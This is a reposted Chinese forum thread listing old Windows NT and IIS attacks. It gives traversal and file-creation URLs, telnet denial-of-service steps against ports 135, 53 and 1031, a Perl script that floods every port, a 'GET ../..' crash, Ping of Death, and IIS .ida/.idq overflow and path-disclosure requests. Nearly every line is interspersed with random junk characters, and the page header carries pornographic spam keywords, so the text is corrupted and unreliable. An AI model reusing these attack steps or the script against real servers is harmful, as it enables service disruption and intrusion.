久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖

    1. <sub id="9pxky"></sub>
    2. <small id="9pxky"></small>

           找回密碼
           注冊(cè)

          QQ登錄

          只需一步,快速開(kāi)始

          NT的漏洞及描述(英文)

          [復(fù)制鏈接]
          1#
          發(fā)表于 2011-1-13 17:12:25 | 只看該作者 |倒序?yàn)g覽 |閱讀模式
          受影響系統(tǒng):4.0,iis 1.0) U% z7 ]* t* z; f
          A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
          3 \# {. E* @8 {/ H9 s+ q, |! j  G' s. o) M
          A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.% ]  f( c9 `2 Z  E  L
          ) I4 {/ m) O" ]+ R7 I8 m% x
          By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
            @2 ?3 j4 v3 ]4 B3 Q$ D" n5 d) M: t
          ; U+ _3 {! I0 k7 }--------------------------------------------------------------------) `1 Z1 J7 f, i. t

            M5 O, X5 V3 j. \' f: i8 k* [受影響系統(tǒng):4.0
          9 g; N9 i4 [4 x1 |A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.. v# A+ R3 H  j  ~& U6 z
          $ Y; Y7 W7 A6 f, F& }) n! s. ]3 ^
          If the file 'target.bat' exists, the file will be truncated.! C- y& Z5 w! I2 ^: N- n+ p
          % Z1 e( x% t5 |# l
          7 `: Z# D/ Q/ N0 n9 G) B2 ?0 w
          A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.3 L+ Y# |" D! T
          1 g$ M: \  {7 y: N
          ----------------------------------------------------------------------  K) i8 S5 N3 @6 p" u

          8 Q- S( r2 f9 P: C" C0 \, x7 E7 Q受影響系統(tǒng):3.51,4.0: }% j5 W; {, T2 S
          Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.4 ]) r; z5 s. c! i2 D

          ) ~9 E* L, c/ g# z  eThe following steps;* `5 J* p) b9 Y  K  Z3 Y

          8 l  ?) w, L* m$ Y# E& S8 \) `Telnet to an NT 4.0 system on port 135 " a! ]6 z1 F/ T0 h2 g1 W3 b
          Type about 10 characters followed by a <CR> 6 G- o& A  I9 V- v- n
          Exit Telnet
          7 D) }$ V! i: i9 }2 u+ G6 `results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.- V" j6 ~. p, z4 w

          ( N$ s& p5 b$ w# G7 t% ], tWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.) M% [" K7 V* j1 G

          4 {" a, u$ ?. r4 C8 d* I2 ]' TThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.# G( w4 J0 n( [) m; S

          4 y& k0 ^/ Q4 U1 K/ P; CIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.' y4 A2 d. g. t
          - Y" S' ~+ v8 @
          The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):6 x5 X, ^7 r5 f' F( W: h
          4 ?( S1 ^" K; L3 q% L/ w' j
          /*begin poke code*/
          2 w: U2 U5 a( j& J! v' a; w$ R) x
          ( \- b. I) p( S' p; Tuse Socket;
          % J* u' P5 K2 |* v5 s5 u  Vuse FileHandle;
          4 K3 H6 k6 r1 D5 R9 i6 f+ Yrequire "chat2.pl";  B) G' D1 n2 R7 W1 G
          / w9 P7 }- M  f. c) i
          $systemname = $ARGV[0] && shift;
          % X1 j8 B1 Z+ [+ Q0 i& E' t* \0 b: p
          $verbose = 1; # tell me what you're hitting1 ?. H' _  ^/ T1 `' b1 ~
          $knownports = 1; # don't hit known problem ports% U* n' d6 G6 M1 v% P
          for ($port = $0; $port<65535; $port++) : Q; F. G  C  r+ m$ ]5 ~/ t6 |
          {
          5 l) X1 S: }% y5 Z
          & K' A  S4 F5 _: ^
          + {& A2 X) o) V. `' qif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
          1 r+ D) J1 e& L4 {next;
          # ~: E6 ^6 a" z}
          + G) R/ x! z( P4 O4 ?$fh = chat::open_port($systemname, $port);2 \  G6 X5 X/ H6 L: e
          chat::print ($fh,"This is about ten characters or more");" E9 `: o9 {! U- m, f: p! _. T, ~
          if ($verbose) {7 @( y; X2 D- ~9 l3 o! Q
          print "Trying port: $port\n";; e% ~: d' |/ Y6 K2 }+ c
          }
          . e& F- S$ m& G; D+ i+ U' X4 Ichat::close($fh);0 f  Z0 x8 T8 X: `, `7 o& {9 x9 ^

          " a; b2 `2 ?, ?7 W( `3 W}; i+ c3 m$ N9 ?; }% D7 d

          * e) }2 S: ]  y, _( q- Z& x0 }: X7 _  J" {% H
          /*end poke code*/
          , \% s( P: Q6 c+ I9 O1 }$ q
          9 ]2 T+ j, ~6 N4 G0 LSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername8 S$ f: E0 Q, `3 T/ ]
          1 T" G7 G, E8 F
          --------------------------------------------------------------------------------
          1 I. o) X: n$ M0 l' v( r7 R3 q7 p! F0 R3 n( A2 i
          受影響系統(tǒng):4.0
          1 e( j: F  I% p* m0 V# C, cUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
          7 }) y" p9 e1 X# U# b8 H; d* |9 [; x7 `& e
            V8 @6 j' \. d+ y* N6 }This attack causes Dr. Watson to display an alert window and to log an error: " V$ W) \2 x, L3 p; W

          , v6 u6 J' T! O: n"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
          6 M; C1 H  D1 y4 T; n! F) L* |( F/ y( D2 i! q/ \
          --------------------------------------------------------------------------------, ~* \& Q- F8 w: ~& `

          3 H# [. K3 v4 [9 l* B, i; ~# Y) X+ K受影響系統(tǒng):3.51,4.04 r+ p" Q  w. l" J% h: \
          Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:/ `& I4 B# Y- T! W/ n
          * Z' a) N- Z& \* e! R& d
          STOP: 0X0000001E
          $ U: K7 ~' k7 U( Q1 P! I3 f6 U8 A5 aKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
          " [/ j  l4 V+ A# A/ T% \$ H4 W, H# t' D7 x2 c
          -OR-
          , {7 W; q, }2 z4 e' N9 k/ M% h! h8 G
          0 |; c: f$ l- vSTOP: 0x0000000A: M; W4 `6 L4 k* q0 R
          IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS; z7 Q% L0 e8 ]8 _5 s8 m

          " M1 E. p! ~/ \; g7 x. pNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.0 X# ?! C* k5 W2 r7 q6 j

          1 Z  p- N! C0 q. F: ~--------------------------------------------------------------------------------1 h2 n6 t) V2 V- _) l7 z2 _; y! L

          " Y/ V  S/ v& P6 h6 wMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
          # n/ ^/ h7 {8 z' k" Y. M9 M2 j& A0 O: p' ^. ^/ i
          --------------------------------------------------------/ f6 @% P: k# K" w
          - l6 P& C# w/ Y' j0 _
          IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
          您需要登錄后才可以回帖 登錄 | 注冊(cè)

          本版積分規(guī)則

          QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機(jī)版|小黑屋|汶上信息港 ( 魯ICP備19052200號(hào)-1 )

          GMT+8, 2025-11-7 01:33

          Powered by Discuz! X3.5

          © 2001-2025 Discuz! Team.

          快速回復(fù) 返回頂部 返回列表